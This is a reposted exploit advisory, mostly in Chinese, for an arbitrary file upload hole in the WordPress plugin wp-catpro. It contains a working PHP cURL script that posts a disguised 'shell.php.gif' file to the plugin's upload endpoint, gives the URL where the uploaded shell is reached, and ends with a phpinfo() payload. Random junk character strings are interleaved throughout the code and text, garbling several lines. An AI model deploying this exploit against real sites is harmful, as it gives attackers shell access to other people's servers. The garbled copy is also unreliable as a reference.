WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
3 j5 e6 s$ ]% D+ y6 p#-----------------------------------------------------------------------

, a3 \8 h/ c2 t! R- H作者  => Zikou-16
邮箱 => zikou16x@gmail.com
0 K( q0 V" c' z0 p, ^# o: W* G2 ^测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
! z4 f" M3 F1 o  x( g& U. g* |# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
0 z5 I: }$ c6 L# I0 c* V& {------------------
% S6 q8 ]6 @& T
#=> Exploit
-----------
3 d& ?0 c0 w' n  q: U- W4 K<?php

! m6 a6 X: q  \" `$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
7 t" W* g  q7 I" u- z5 i* M0 Tarray('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
+ x+ }. q8 O+ m1 m5 o& pcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
& Q" |" k2 E% M+ q/ j$postResult = curl_exec($ch);
curl_close($ch);
) u$ }+ y9 s% o
print "$postResult";

Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
- I8 k$ ^! G9 X  t7 {6 D<?php
phpinfo();
# S  x( A& x& H9 w( f, O$ E?>